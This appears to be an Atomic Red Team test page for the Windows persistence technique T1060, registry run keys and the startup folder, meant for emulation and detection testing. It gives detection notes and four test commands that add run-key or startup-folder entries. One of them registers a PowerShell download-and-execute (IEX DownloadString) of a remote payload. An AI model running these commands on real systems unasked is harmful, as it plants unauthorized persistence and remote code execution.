Skip to content

Latest commit

 

History

History
108 lines (75 loc) · 4.37 KB

T1060.md

File metadata and controls

108 lines (75 loc) · 4.37 KB

T1060 - Registry Run Keys / Start Folder

Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.

Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.

Platforms: Windows

Data Sources: Windows Registry, File monitoring

Permissions Required: User, Administrator

Atomic Tests


Atomic Test #1 - Reg Key Run

Run Key Persistence

Supported Platforms: Windows

Inputs

Name Description Type Default Value
command_to_execute Thing to Run Path C:\Path\AtomicRedTeam.exe

Run it with command_prompt!

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f


Atomic Test #2 - Reg Key RunOnce

RunOnce Key Persistence

Supported Platforms: Windows

Inputs

Name Description Type Default Value
thing_to_execute Thing to Run Path C:\Path\AtomicRedTeam.dll

Run it with command_prompt!

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f


Atomic Test #3 - PowerShell Registry RunOnce

RunOnce Key Persistence via PowerShell

Supported Platforms: Windows

Inputs

Name Description Type Default Value
thing_to_execute Thing to Run Path powershell.exe

Run it with powershell!

$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force


Atomic Test #4 - Startup Folder

Add Shortcut To Startup via PowerShell

Supported Platforms: Windows

Inputs

Name Description Type Default Value
thing_to_execute Thing to Run Path C:\Path\AtomicRedTeam.exe

Run it with powershell!

$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()